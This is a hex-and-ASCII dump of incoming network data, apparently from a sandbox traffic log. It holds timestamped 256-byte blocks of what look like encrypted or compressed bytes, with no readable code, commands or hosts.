                                                                                                                                                            2022-09-29 12:45:20 UTC28892INData Raw: 71 d9 9d d0 42 d4 77 79 11 6d bc 18 3e 9b 29 48 12 3e 56 ec 85 26 59 d9 88 76 47 4c 87 29 6d e2 94 54 e4 59 60 5c 65 3b af 7e 62 9b ab b3 73 91 c8 67 8e 54 4e 8b a1 08 98 5c 31 5e f7 67 53 2a 8c 98 0c ce 63 90 23 e9 be 3c 18 45 35 2b bf 7e 41 21 3c 81 35 99 43 a6 cd 91 c9 43 d0 f5 69 3f 40 04 65 7c d1 27 2d 65 0e 9b 4a 05 d2 2f 18 3d c1 43 d1 cc f8 cf 78 df ce 2c 45 5d c4 ea 10 da 33 95 5f 32 54 bb 50 01 44 b3 01 81 fd 00 ce 3a 44 77 42 e9 fa 40 99 e9 eb 90 f6 17 ec ce 58 12 65 d3 1b 1c d2 c6 24 d6 b7 69 67 58 ae a9 36 4c c2 10 5b 42 96 86 5b bf ac 41 f8 df 83 08 bc 5d c7 e4 8d 12 52 39 4d 0f c1 a1 9b 03 cf f2 bc 50 af 33 1f 58 4b 3c d6 38 56 95 41 6e c6 d6 ee 1d 75 e3 2b 6f 22 c0 a4 97 cf 20 45 8b f9 22 7d a1 b5 3a ec 26 21 d7 52 3a ff 2d a9 08 5a 39 3c
                                                                                                                                                            Data Ascii: qBwym>)H>V&YvGL)mTY`\e;~bsgTN\1^gS*c#<E5+~A!<5CCi?@e|'-eJ/=Cx,E]3_2TPD:DwB@Xe$igX6L[B[A]R9MP3XK<8VAnu+o" E"}:&!R:-Z9<
                                                                                                                                                            2022-09-29 12:45:20 UTC28908INData Raw: e0 c2 98 ff 5d fb 95 0e 2a 70 c9 7b fb 40 69 a3 eb 7b 8c 52 5a 81 f4 15 26 11 7c 4f 4c 33 34 b1 d4 b8 44 3c ff c5 f7 aa eb a3 fe b5 01 67 1c 5e 0b 1b 14 24 19 b6 33 05 07 12 b4 48 6a 1f 82 c0 c8 a7 aa a9 b7 7f 15 ac b0 ff 5a 59 85 77 9b 8e 2f e8 b1 90 f3 f8 5c 4a 7d 85 11 c2 f3 aa 60 57 82 99 5a 57 01 b0 2a a4 c5 75 06 8e 56 ab ff 0e 2b f1 30 bb 1c 9b 93 0f 7c 3a b3 14 c1 ff ff 97 33 1b 11 d4 2a 4a 5c 52 4b 2e ec 29 35 99 54 54 44 74 cd 9b 8a 12 0b 35 3e b9 87 60 e9 e1 9f 09 e6 76 47 80 57 f2 8d c6 83 1c f5 98 37 13 ab 85 3a 52 dc 4e e2 8f 95 10 9a 3f ad c5 4b e2 a2 d2 76 df a2 83 d1 f2 f1 50 5c ae 79 8e de a2 36 78 4f 25 e2 3d 52 3d 44 38 d2 d0 01 91 52 a8 9a bf 4b 79 da c2 0d b1 a7 78 15 c0 ba 24 2c 66 61 5e 88 0d 90 6c 6b e5 cb 22 a6 3c 66 dd ce ad ab
                                                                                                                                                            Data Ascii: ]*p{@i{RZ&|OL34D<g^$3HjZYw/\J}`WZW*uV+0|:3*J\RK.)5TTDt5>`vGW7:RN?KvP\y6xO%=R=D8RKyx$,fa^lk"<f
                                                                                                                                                            2022-09-29 12:45:20 UTC28924INData Raw: 75 9b bf 60 71 9c 3e ec cb de 71 fa 73 84 19 3d 16 22 ee 11 2e bc d7 e7 5d a6 12 c0 0f 80 aa 7a 0e d5 cd 1c 65 8a 5c 93 b1 1e ef a6 f1 05 ba 6d f0 e2 f8 fb 8f 0e 2a 87 86 54 04 4f 3e c3 76 3e 56 17 b5 55 e1 88 92 cb 4a 8b 2a 24 da 6b 2e a4 a6 4e bb 9f 69 7a 62 67 42 b4 bf 31 cd e1 8b 18 07 8d ff 15 44 0d 87 96 28 cd c7 f4 fd bb a7 93 a5 ba e8 6f 60 a2 18 33 26 0f 3d 9b b1 3a db f2 5f 17 5c 31 ea ea 2b fe b7 19 5b 7c 07 08 f6 8c a5 9e 88 0d 51 13 5e 07 63 70 7f b1 d2 88 c3 41 e3 9b 3b ce a4 55 36 b8 33 ee 42 f3 3c 7f 9a c9 60 fd fc e8 f9 c7 77 33 08 8f d2 f6 0d ce 90 73 5e 15 e9 1c ef 1e 72 1d e1 b8 d4 e5 39 d9 0d 76 f2 9d 9a 78 b8 77 cc 40 1f da 36 94 da 53 bc 6a 7a cb 1a 6e 9b 69 01 39 31 ce b4 87 e7 bd f7 84 17 a1 42 7e 0a 90 d1 8b 25 ea 9e d4 e2 8e 7a
                                                                                                                                                            Data Ascii: u`q>qs=".]ze\m*TO>v>VUJ*$k.NizbgB1D(o`3&=:_\1+[|Q^cpA;U63B<`w3s^r9vxw@6Sjzni91B~%z
                                                                                                                                                            2022-09-29 12:45:20 UTC28940INData Raw: 5b 1f a6 3b 2a 8c 87 e2 87 32 0e b9 bc 91 e2 6b 2d 1e d0 7f e2 ef dd 1a 69 ae 68 70 23 8e 90 e4 ca fc 9c f2 fe 03 62 54 f5 df 62 77 22 81 fa 9f 8b 07 52 90 fe 60 b8 ec f3 eb d3 5c e5 24 c0 73 38 ed 28 da 37 2e b9 c1 91 fe 43 74 bf f3 cf d5 17 b5 d3 4b c6 be 15 46 63 43 af 3b ba 52 d2 25 df 4c 28 2e 6f 3a d6 f2 bf 5d df 7e 26 5a 72 ae ee d4 c4 be c5 81 80 18 26 7c 80 32 71 bd 81 63 76 51 b3 24 70 db f5 1e 8c 60 8b af 63 eb ff 0b f5 99 ee be f3 5b 4e 85 25 2f b0 29 69 6b e4 1b 6f 49 ce b0 38 8c 61 36 77 82 1b 17 ce 6c c4 a6 c2 66 10 2f 51 62 99 56 0f a3 c1 b9 c9 11 e0 5e 8a 88 8c 63 d5 50 82 47 88 e8 be 0f 11 93 f6 67 82 16 f2 a0 2e 07 b8 05 52 82 a8 a0 19 04 f6 b6 19 8e b3 78 43 f0 92 b3 68 88 c9 54 ae 6e 92 57 e9 0b b2 f7 5d 80 b0 8b 96 94 d0 b2 a4 fc d1
                                                                                                                                                            Data Ascii: [;*2k-ihp#bTbw"R`\$s8(7.CtKFcC;R%L(.o:]~&Zr&|2qcvQ$p`c[N%/)ikoI8a6wlf/QbV^cPGg.RxChTnW]
                                                                                                                                                            2022-09-29 12:45:20 UTC28956INData Raw: c2 90 a2 e1 69 48 26 83 54 36 78 cc be f2 57 8c fd 81 0d 99 ee d3 20 14 a1 47 d5 54 aa de 7f b6 01 f2 5b 71 f4 a8 09 f9 70 3d 9e 89 c0 0e 67 3a ba 05 77 0a 76 ce 6a 6d 3c 78 e9 97 67 8a 65 b6 53 a2 88 f1 57 8f 9b 9f d9 d7 c7 8b 3b 7a 76 1b 90 02 6e 96 bf 3b a5 9e e0 c2 24 90 76 26 51 1b c0 d7 56 48 99 57 26 69 9b f7 71 90 ba 35 41 84 2a 5c fe 5c ca 70 c4 31 c0 bb 85 59 0d 6d 8d b2 fe da 9f 75 84 18 08 28 94 03 eb 4f a0 b4 5b 21 c5 11 23 85 dc bb ee 09 81 42 c4 70 42 93 35 2d 00 3f 56 18 84 c9 3d 32 63 9e 17 75 da 53 d4 20 b8 7a 9b cd 23 7b fb 0a db f6 f3 e5 f3 20 35 ca d3 fe 45 27 8d d1 fc 3c 15 11 6d 1c ec 49 04 02 06 0d 3e 11 a3 59 8f ae ae 44 d3 ac 39 a6 00 e4 9e bc a0 88 5d 51 e1 8d 5a ff 4d cb 5d 49 5b 3b f8 52 ae 55 ea 11 4e e9 20 2d 95 16 85 26 3c
                                                                                                                                                            Data Ascii: iH&T6xW GT[qp=g:wvjm<xgeSW;zvn;$v&QVHW&iq5A*\\p1Ymu(O[!#BpB5-?V=2cuS z#{ 5E'<mI>YD9]QZM]I[;RUN -&<
                                                                                                                                                            2022-09-29 12:45:20 UTC28972INData Raw: 72 45 a8 61 f5 eb 1b ef de 36 21 05 2f e8 23 e7 5b d1 ba e9 fe c8 2f f2 e8 a5 cb 59 6a 73 cd 73 84 d0 36 e8 0a 9c 41 ab a3 db eb 9c 7c 2b 0a 04 c4 e7 d5 79 fe f0 c7 88 81 16 e8 ae b4 ee 9e d3 ae 35 33 25 32 ad d0 47 dd be 1b 35 d5 14 34 d0 d4 84 58 06 57 a5 82 1f 8c ff a0 a1 f6 aa 85 fe 2a ec 89 fc 8b 85 d6 94 7e ff 2d 33 0b 56 d0 c4 6b 34 ee 62 6a 3b ff 0a 2a 62 f3 c1 ce 73 fe 4a dd 27 61 65 54 ef 8e 71 12 32 9f b1 a1 98 9d 22 1c 8d 13 a0 bb 73 66 ab 1c b2 d1 79 a4 e4 95 f9 12 60 24 18 9e 00 36 50 05 9e 6b f4 df 6d fa 58 d4 48 da 68 85 fd d6 0d 5d f9 90 4e 10 d6 f0 27 b4 c9 59 88 32 3d b4 a7 a2 52 22 4d df 6d 12 96 39 45 48 f1 c9 ce eb 26 30 5c 1b 6d 08 db a4 f3 8c 4e 72 68 6d 5c 7f 8b 0d 9e f3 ea 01 e3 37 8b 8b 01 88 9e f2 39 6f 47 72 5a c8 9e 3a 6a de
                                                                                                                                                            Data Ascii: rEa6!/#[/Yjss6A|+y53%2G54XW*~-3Vk4bj;*bsJ'aeTq2"sfy`$6PkmXHh]N'Y2=R"Mm9EH&0\mNrhm\79oGrZ:j
                                                                                                                                                            2022-09-29 12:45:20 UTC28988INData Raw: fc ac 25 8e e8 c8 f5 e8 e6 e3 7d 2f 27 9c 48 e1 b3 1a f2 75 dc 07 d6 5c 7c 1a 5e 6f 5c b1 9a 56 0b a5 02 2d d1 2e 88 9a 30 73 cc 9a e8 03 64 c7 a6 33 c4 20 0e 53 54 ee 97 08 98 16 e2 d6 f6 22 90 28 ae ee 57 0b 12 10 24 81 c0 99 5f 03 f3 be e0 57 1a ca 64 d5 31 52 47 28 13 74 5f 15 07 86 fc f6 ba 47 f8 41 ab cb db 37 d7 43 8c 30 e7 f7 54 98 a5 45 83 5b fa 1a 15 43 7a 6b 3f c0 36 ae 0b 45 70 71 c0 b2 5d f8 3a 8b 61 69 87 a0 b3 d5 ad 85 6e ee e5 fb 04 6c b2 7a 9e 5f 24 ad fe e7 36 ac e4 c4 3a 37 d5 e1 81 d9 7e 57 68 60 ec 42 2d 9e 9e 6d 44 e5 bc 52 da d7 64 b6 db c9 af f5 67 e4 dd 16 64 ab 85 5d 8b 19 7f f1 cc 18 35 66 d6 89 5e 11 de 3e ed 77 eb 85 6b 22 45 23 40 5b 96 27 44 36 ad 8b ee 8d d6 b6 ec 61 88 c7 03 1e 4f 33 cc 81 5b a3 1f 00 8e 8b 14 67 46 60 76
                                                                                                                                                            Data Ascii: %}/'Hu\|^o\V-.0sd3 ST"(W$_Wd1RG(t_GA7C0TE[Czk?6Epq]:ainlz_$6:7~Wh`B-mDRdgd]5f^>wk"E#@['D6aO3[gF`v
                                                                                                                                                            2022-09-29 12:45:20 UTC29004INData Raw: c9 77 26 dc b5 89 97 6a 0d ca 17 b9 4c 08 21 64 9c 20 ad b7 06 7a 59 42 1c c1 79 c1 7c fb cc d1 fe e4 d5 8d 74 27 98 69 eb 0a 25 99 1d f2 77 44 1f c6 8d 8e 04 cb 60 20 c9 35 be 41 60 ea a7 99 e9 63 0b 95 85 8f 31 1c f7 0e ae 6f f9 77 8e 82 05 0f 70 e6 05 88 c6 66 e5 c8 bc 3d 1e c1 56 c3 ac 2f 1f ba 8c d2 0e 98 7b b7 84 2e b0 31 91 07 32 3b 1d e5 b2 ce a5 3b b3 b4 94 a8 25 94 c2 ff 8c 07 50 df e5 f2 94 d8 53 15 2c e9 61 bf 7f 89 54 41 ed c8 6c 54 d4 2e 09 30 0f 74 79 54 8c e5 48 cf ba 1b 26 c6 31 61 30 a6 84 af 33 8a a9 6d 85 5d d2 b7 35 28 26 7f 4a 8b 7c 85 53 95 8b c4 08 ea 9f 7e a0 8d 6d 9f 5a a0 12 9c 46 f1 ee 8d da 2e ff e7 e9 12 07 92 bd c6 87 d6 a0 b4 8c 4d da 88 b9 3c a9 db 66 a9 3d 78 fb 5a f3 03 0f df ca ee d4 fa b0 9b 9d d3 b3 3f 15 6b 43 a3 fb
                                                                                                                                                            Data Ascii: w&jL!d zYBy|t'i%wD` 5A`c1owpf=V/{.12;;%PS,aTAlT.0tyTH&1a03m]5(&J|S~mZF.M<f=xZ?kC
                                                                                                                                                            2022-09-29 12:45:20 UTC29020INData Raw: 21 57 d8 ac a5 d6 ac c5 9d a3 f8 4b 43 f7 e5 79 d4 aa 55 7d a9 55 76 28 d7 2f b4 f6 70 21 b5 e2 40 15 03 ae a7 49 89 96 cf eb 93 57 29 0d f2 e6 44 46 15 27 93 84 5d a4 42 66 ba 78 91 47 40 b0 d0 ee f5 19 43 6c e8 07 00 22 ac 11 b8 0d 39 3c 5e 18 e9 8b 0c c7 22 7d 75 9c 00 65 ae 57 00 67 28 a8 a8 8d 43 94 27 05 6b e6 95 85 85 16 89 ff dd fb 42 f1 6a c2 75 42 10 2a 7f ac 35 56 08 70 a5 e1 dc e8 f8 e8 3a a0 8b 81 c2 77 9f 35 6c f0 9f 76 29 45 14 62 3f 9f 29 57 ef 0f e6 dc c5 d0 81 92 bf 67 5a fb f5 62 60 29 1a ec 73 ba 36 79 21 cd d4 cf d5 e2 9b ea 57 ca c8 15 2a cd cf 3d 9b 9b b2 a9 02 9a f2 73 74 07 e8 9a c3 5d cc 50 6b 00 81 0b 66 13 83 fb bb 5e 7a bb 78 94 91 dc 5a f1 a5 b6 07 23 cd 71 df b7 d8 d9 2b ff f7 48 3d fb bb 20 cb e0 76 27 81 ce 4c 60 b1 74 6c
                                                                                                                                                            Data Ascii: !WKCyU}Uv(/p!@IW)DF']BfxG@Cl"9<^"}ueWg(C'kBjuB*5Vp:w5lv)Eb?)WgZb`)s6y!W*=st]Pkf^zxZ#q+H= v'L`tl
                                                                                                                                                            2022-09-29 12:45:20 UTC29036INData Raw: 3f 3c c6 75 42 9e 6f 56 3d 4f 80 4c 04 9b 5b 54 7a 53 e2 f1 20 b1 e6 80 4f 00 cf 9c 4a 0b 77 88 79 70 33 e0 5e cf 47 ee b0 31 22 6e 73 de 66 a2 58 f0 35 27 51 a1 33 25 ca 88 67 14 bb 5a 11 ad 49 79 4d e1 0a 7b be 52 d8 b6 be ae 44 05 76 df 12 22 48 b1 1d d5 42 71 d7 f3 fe df ae a6 87 ae fe f5 8f ea 4a 77 67 c0 f4 f3 1b 53 a1 fe bd 88 29 f6 30 85 4a fd 2f 07 9b 97 3a 4a 25 66 2f 81 ea 25 59 e1 e6 e9 5c fc 8f b6 24 b4 ba fc 1c ba 71 70 29 06 cf 01 0b d9 97 4c b9 15 7e 35 da 26 32 c0 e1 06 53 88 d6 ae 8f 39 db f2 70 17 7d f0 b2 c9 ef 0a 58 47 af 51 e6 e7 56 1b ad 6b 88 58 16 27 51 03 ab f4 0f 47 cb aa d6 61 0f 7e fc 32 02 ed df 62 ca aa ad 6e 74 c6 67 5c 65 18 f6 a5 87 db cd 19 09 64 ab 49 13 7a 01 7a 40 ca 0d 34 d9 f3 45 92 b7 58 57 02 8e cc f0 7d b4 d1 8f
                                                                                                                                                            Data Ascii: ?<uBoV=OL[TzS OJwyp3^G1"nsfX5'Q3%gZIyM{RDv"HBqJwgS)0J/:J%f/%Y\$qp)L~5&2S9p}XGQVkX'QGa~2bntg\edIzz@4EXW}
                                                                                                                                                            2022-09-29 12:45:20 UTC29052INData Raw: 2c 31 fd d4 5b b5 f5 ab 18 a0 c1 b9 fd 6d 7a 4c 04 e8 b3 3f 91 fd 6e 33 20 63 9d 01 44 10 bd d4 1d 43 61 91 92 be 86 90 6b 10 d9 d8 b2 74 e9 4f 65 09 92 38 48 ab d3 ed 97 7c d6 df 48 5c 2a 79 52 2b 93 21 ec bf 5b d9 3b 46 3a ef 88 ca 39 87 3b 46 c1 b7 24 62 ee d7 36 c7 2d 7b b0 29 1a fc 19 75 93 7e 46 c3 16 54 e4 54 a9 ff f4 4d b0 38 cb 0d 50 34 98 ce 7f 0e 94 c7 d9 0f 21 ea ed b5 ea 6d 70 9c 79 f0 fb 70 4d 61 c1 d6 55 89 67 b3 76 16 fd 61 10 82 a4 2b ba 63 3e d9 55 99 cb d2 02 d1 d5 7a fc eb f2 a8 d0 f2 98 4f 57 48 98 a4 99 f5 fc 50 a8 52 6c b9 f2 f1 fa b7 46 2c 61 f5 de 05 b4 f9 bb 2e dd 51 85 9e 1a 07 a4 f3 06 dc 16 2e 8d cc 14 9d 0c 8d 04 8a d0 ec cc e1 8e d4 b6 a3 c0 41 0b c0 2e d5 d4 f9 1c 21 bd ff b0 27 42 b8 2d f2 19 ae e1 72 a3 bc c8 69 c3 43 2c
                                                                                                                                                            Data Ascii: ,1[mzL?n3 cDCaktOe8H|H\*yR+![;F:9;F$b6-{)u~FTTM8P4!mpypMaUgva+c>UzOWHPRlF,a.Q.A.!'B-riC,
                                                                                                                                                            2022-09-29 12:45:20 UTC29068INData Raw: d3 9a 86 80 05 9e 65 33 81 ee d4 2e 56 90 1e 91 dd b1 9e d3 bc d4 57 b0 7a 23 f6 44 63 0b bc 8d ef 96 58 3f 37 f4 fe b5 ab 0d 1e 71 d0 0f 2a 5f 27 72 19 71 81 96 7f f4 1c 70 d0 76 84 80 a8 73 9b ab 71 5e 43 c4 40 c5 1c 1b a5 b7 63 6d 17 84 fc ab 04 8c 4c c7 04 6c 2b 46 28 21 4e c9 c4 06 f0 26 c1 3c b5 3d ee 61 a0 49 e5 2b bf 66 b4 16 0f 88 0a 2b 32 69 9a 92 04 5c c4 73 92 f7 15 a0 96 29 e8 ce 25 98 21 48 09 5f 8d 25 f5 e0 f2 47 d1 c5 23 1f 7f b1 4d a8 3f 3f a9 f2 04 2b 9e c5 34 f3 d1 20 3c e4 a9 10 a1 3c 67 2f 17 84 ec 49 54 4d 71 0f 41 2b 13 e9 69 c2 1b 30 a3 6c de f1 d8 1f ad 75 e9 48 d7 f2 f8 e8 f2 7c 9a 84 2b a2 12 5e 38 26 2b 13 51 84 b4 0b 20 c4 4a 08 7c b7 d8 3e 96 51 70 0d 1c 36 66 d9 3d a8 ba 5d b8 7c dc 58 f3 cd 0f d6 6e 1a c2 76 53 3e 98 8f 00
                                                                                                                                                            Data Ascii: e3.VWz#DcX?7q*_'rqpvsq^C@cmLl+F(!N&<=aI+f+2i\s)%!H_%G#M??+4 <<g/ITMqA+i0luH|+^8&+Q J|>Qp6f=]|XnvS>
                                                                                                                                                            2022-09-29 12:45:20 UTC29084INData Raw: 5b f0 c3 a5 d1 44 b5 1e 2b a6 b7 a9 f4 ce be 21 a4 34 e9 0e 3d 7f 52 47 22 2c 73 d8 55 54 43 d1 11 05 aa ce 17 be f7 7a 6c ef f3 6b 78 f3 f1 da 96 32 33 51 66 15 b0 75 e7 36 3b f4 14 2b a2 f5 cc 5f 54 48 cf a9 22 fe 53 cf 9a 47 10 ca df c0 19 b8 82 1f 31 ba c6 03 96 ad 3b 05 ee 83 ad c8 33 c4 b7 49 12 09 2d 6e af c1 c5 26 fa cc a8 7b 86 b3 bb 0f cc 8f 95 79 72 33 17 ab 4e 73 c5 a0 1c f1 ec 3e 63 04 a9 1d e3 a8 fa ba 96 49 c7 d0 e0 73 c1 19 5b be ff c9 f4 f0 34 41 05 73 6f 3e ee 65 e7 1c 44 ab ca fe 5b 0b 08 49 b1 6a 16 b6 48 64 cf 5f 5c a9 62 b1 f6 b2 b5 b9 3b 16 71 9c ec 52 87 fc 38 e4 2b 62 c5 aa f5 b0 45 19 c5 09 d1 e9 86 83 4e 95 d2 21 36 06 2b 4b 56 96 26 c7 8e 8b 16 d0 a7 61 a5 23 ea ee 69 45 8e a1 cc ef e9 cf 39 0a 33 37 0f ed eb 7a c6 a3 ae 24 bd
                                                                                                                                                            Data Ascii: [D+!4=RG",sUTCzlkx23Qfu6;+_TH"SG1;3I-n&{yr3Ns>cIs[4Aso>eD[IjHd_\b;qR8+bEN!6+KV&a#iE937z$
                                                                                                                                                            2022-09-29 12:45:20 UTC29100INData Raw: d4 6b 98 12 66 60 b9 91 f4 74 e6 c9 8e 70 74 a9 36 02 ff f1 4d 28 fc 45 94 9a 1d f5 d8 c2 fe c5 29 13 0a 96 18 d6 6d 61 35 1a e1 33 2b 6f a9 67 c8 71 02 3e 99 9a 7f b6 1f de 00 e8 5c d1 e0 06 38 53 e6 ea e2 87 f3 0d 2e ec 74 04 0e 6c 05 83 41 97 46 a6 5a 2b c0 41 b5 4b 3b 0d 6b 3c 39 dd df 07 99 c5 c5 d8 20 4a 1c d1 1d a1 b6 28 18 9c ea 03 9b a9 bc 97 ab 42 cc 32 8f 26 34 7a de ab db d7 15 1e 38 c0 e1 3a 89 e9 49 4b 9b ed 1a 7d fc 9a 77 e8 09 da 42 9c 71 00 01 da 4c 35 51 39 02 7a 7b 76 7a d3 63 15 9b ed ab 14 f3 ef 69 4f bb ab a6 f1 47 7e 5c c7 18 4c a5 94 72 62 78 26 43 e1 0f db 3f 43 6e dc e0 07 57 b9 f3 2a 1d 77 2d 6b bc 77 1d 4d a2 a4 cd aa fe d1 24 aa 04 23 0a 8e da da 02 44 a7 b4 54 6b 12 0b 7d fa 2f 6a 4f 2b a2 4b d3 88 26 61 00 33 e3 f7 ff 8d 26
                                                                                                                                                            Data Ascii: kf`tpt6M(E)ma53+ogq>\8S.tlAFZ+AK;k<9 J(B2&4z8:IK}wBqL5Q9z{vzciOG~\Lrbx&C?CnW*w-kwM$#DTk}/jO+K&a3&
                                                                                                                                                            2022-09-29 12:45:20 UTC29116INData Raw: d5 14 85 ce a7 19 86 30 3a 05 05 ae d8 6d 9e e3 6d a0 f2 2a 69 21 bc 4c 67 00 16 b5 3c 7f 16 48 d1 2f f9 7a f8 a4 be 93 fd 44 0d 05 94 31 fe fb c9 67 43 c8 6a 8b de b7 d2 6a 92 57 44 dc 52 14 0e eb 27 ca d1 43 62 13 de 92 77 06 74 e8 26 57 be a6 fb 3e 59 c8 30 e6 92 b2 ce e2 a1 07 c0 af b5 d7 4e 64 50 3a 54 91 dd 01 72 b0 98 1b 75 7b 49 f4 87 13 95 06 92 13 64 63 d2 10 fa cb 0c b5 c2 b8 c1 c1 60 49 c9 0c fa 32 27 d1 72 08 19 2a d1 dd ee 97 42 7d e9 e6 3d 66 e7 d7 b7 b8 3d e7 2c c4 94 1e 18 3a 20 d3 c0 91 6a f1 da 5f 06 89 78 4e b3 df 36 8b 8d 0e 8d b4 c1 9c 6a a4 a4 20 af 0c 6a 6b 6f ef 5c 6e 9b 99 77 5f 3a 65 ed 40 02 49 dc f5 89 8d b0 61 de c1 25 89 9c 29 42 ef 84 74 d7 5c aa 86 75 44 e7 dc 8d 09 f8 bc 10 ca 04 67 f5 a8 17 07 59 af 2d 1e 90 62 0c 1c d9
                                                                                                                                                            Data Ascii: 0:mm*i!Lg<H/zD1gCjjWDR'Cbwt&W>Y0NdP:Tru{Idc`I2'r*B}=f=,: j_xN6j jko\nw_:e@Ia%)Bt\uDgY-b
                                                                                                                                                            2022-09-29 12:45:20 UTC29132INData Raw: da d8 76 69 36 e7 b5 af c5 82 48 1e cb 48 20 ca 93 e3 50 77 46 56 a6 ba 42 ec 27 9a b1 b0 32 ac 95 c9 2b b4 98 1c 40 c8 08 b3 b7 3e f7 99 e2 d9 b6 7a 6d 48 d7 9d 28 94 13 d6 a9 23 d1 54 34 17 d2 a5 32 43 56 0f 8c 58 c1 7e 62 f9 f8 b0 7e 7d 42 e2 f7 87 21 51 b3 9e 9a 8f d5 70 2b aa a5 70 60 88 d0 b2 2a 20 07 4e 12 b4 75 9f af 1f ac 79 b9 38 ec 75 60 de fa 9c 94 73 0a b4 a7 d3 82 58 ef a2 40 b9 8c 80 0d d6 6a c8 76 10 c9 11 93 cc ec 13 95 c2 57 7b 46 cf b2 6b 02 5b 64 05 cc 1f 64 8e d0 d1 c5 46 04 00 de e2 5e df fb 3b 2c 05 d9 69 fa 8d b7 68 60 65 14 b7 c1 b7 b0 cc c8 2c f6 6c 20 1a 3d 04 90 ea 21 4b 6b fc 01 c6 76 73 6f ae a8 4b d9 25 7f d7 67 d7 de 4d 0b 0d 6c a0 28 a8 03 b2 38 1a dd f2 7b f4 ca 6d f7 19 55 8c 42 d3 51 33 a1 42 d3 3b 0e 47 00 80 39 01 bc
                                                                                                                                                            Data Ascii: vi6HH PwFVB'2+@>zmH(#T42CVX~b~}B!Qp+p`* Nuy8u`sX@jvW{Fk[ddF^;,ih`e,l =!KkvsoK%gMl(8{mUBQ3B;G9
                                                                                                                                                            2022-09-29 12:45:20 UTC29148INData Raw: 87 d6 3e a2 b2 a0 5a 24 1d 36 64 22 9c 0d 7a 65 05 a0 a2 78 4b 9f 46 88 19 9c 42 db 48 06 51 ca db 4d 1c 2e 87 b7 43 06 5c 71 2c 11 c9 6f b9 42 c7 e5 54 56 15 ea 65 5a 89 a6 e6 b5 72 96 2c fe c1 b5 cf e3 91 c9 d3 ab 12 2f b1 0c 3e 90 9d a7 73 47 00 41 7f 16 fa a4 7e bb 62 c8 b5 84 6c ff db e2 d7 4b 87 ca f3 6e 6c 78 f0 ea 3f ff b7 71 86 6a 75 d8 c4 e6 eb bc 56 be 66 5a d4 70 6c 65 88 74 99 00 b1 1f f6 ca 72 71 e4 2c 21 32 f1 dc f8 e7 d4 ae b8 45 bf 2c 83 33 fa c2 51 11 52 f0 a5 bf df dd 55 bb 8e b3 e5 91 03 6d 10 da de c5 ad 44 df 38 a6 aa 2b cb 0c 74 3d 31 61 62 90 5a 2c 97 b7 f2 c1 39 eb 75 f8 d9 63 cc 1e 53 71 79 48 4e 59 f9 2d ae 68 80 be 8d 5d 91 ed 86 a0 3f d6 93 e6 4c f7 15 33 e5 9c 1b 10 aa 8d ff 33 8a d9 2e cb c2 57 9f 61 84 f6 6b b2 03 b3 f0 3e
                                                                                                                                                            Data Ascii: >Z$6d"zexKFBHQM.C\q,oBTVeZr,/>sGA~blKnlx?qjuVfZpletrq,!2E,3QRUmD8+t=1abZ,9ucSqyHNY-h]?L33.Wak>
                                                                                                                                                            2022-09-29 12:45:20 UTC29164INData Raw: 24 01 07 c1 f9 7a ea 7a 73 cf 04 33 17 4f b0 8c af bf f1 d7 a4 d7 9a b9 57 01 55 83 74 33 86 0f 60 fd 20 99 31 2e f7 6d 95 42 50 aa 82 bf 4f 95 1f 02 ef 77 d3 f3 aa 96 09 85 a2 43 07 ea b2 b3 f4 e0 10 e2 53 0c 7a 32 c8 06 2b a2 de fd f7 cc 51 ad 37 dd 53 a4 cc 76 1e ce f9 96 05 df e3 e3 78 fa 0a 50 2d b2 db f8 96 fd 65 0f 87 7d ae d1 a4 8b 8f a8 3b 1a d9 4d 16 7d e6 0f db 1c 7e a8 1d 6a cf c0 06 ff 37 b3 21 26 87 c5 7f 62 0a 1c c4 df a3 c6 cd 60 85 64 b0 ed 1f c2 41 83 ba 7e 12 fb 0d ff fe 3c ea 33 81 aa 9f 0f 10 a1 64 fb 6c 60 42 c6 b5 94 41 bf bb 7f c2 69 f2 44 75 7c 16 6b a4 0f ac 29 93 ef d0 ad 7c 54 b2 d9 cc f4 10 73 6b bb 7b 94 ee 47 0a b8 77 1d 22 a6 19 6b b7 7e 33 87 78 0c 2c 11 2c 86 39 90 5e db 4e f2 f5 37 d1 4a 6f 14 c8 7d c7 50 b8 40 0a c9 7b
                                                                                                                                                            Data Ascii: $zzs3OWUt3` 1.mBPOwCSz2+Q7SvxP-e};M}~j7!&b`dA~<3dl`BAiDu|k)|Tsk{Gw"k~3x,,9^N7Jo}P@{
                                                                                                                                                            2022-09-29 12:45:20 UTC29180INData Raw: d9 00 fb 09 b8 5b 79 78 80 25 1d 31 6b dd fe 8a 45 1e 16 34 7f eb 8a 7a fd 41 d5 ce db 5b fe 5f 38 fc 2c 65 f3 f0 2d a8 b7 87 61 0d 91 05 05 8e a9 03 e5 02 bf e1 42 82 55 c4 88 ff d4 61 83 7d 42 24 a1 9b 0d 36 e0 0c 74 80 db 80 6e 01 50 7a f7 83 e3 b4 2e 24 b2 db 64 85 bb eb a8 39 73 e3 00 90 20 52 05 6e d7 a2 06 42 cb 0f 26 9e be 28 f9 cc 3f cb 21 d3 42 0a 03 75 d8 a2 23 99 4a 15 bd 2e d2 e7 0f a9 ac 7d 98 de b5 ce 44 e5 3e a6 2b c7 5c d2 11 fa 59 18 0b cb 65 2f aa 29 5f 74 3d a1 34 9b 4d 06 e0 56 d8 39 78 2c c3 de 42 2d cf 70 c0 71 fb e3 c0 a8 e6 8b 73 a2 70 ff 85 07 c8 ee 54 5d ad 02 56 7c a4 f9 98 e5 8a 87 b4 9e 3c 36 34 c9 90 5c f6 cd 61 8d 9a f6 31 b7 e9 80 50 77 82 26 30 cf 77 56 04 c1 14 7b fb 85 98 e2 f3 0c 07 03 da f1 38 95 73 4c 83 00 fd ad 59
                                                                                                                                                            Data Ascii: [yx%1kE4zA[_8,e-aBUa}B$6tnPz.$d9s RnB&(?!Bu#J.}D>+\Ye/)_t=4MV9x,B-pqspT]V|<64\a1Pw&0wV{8sLY
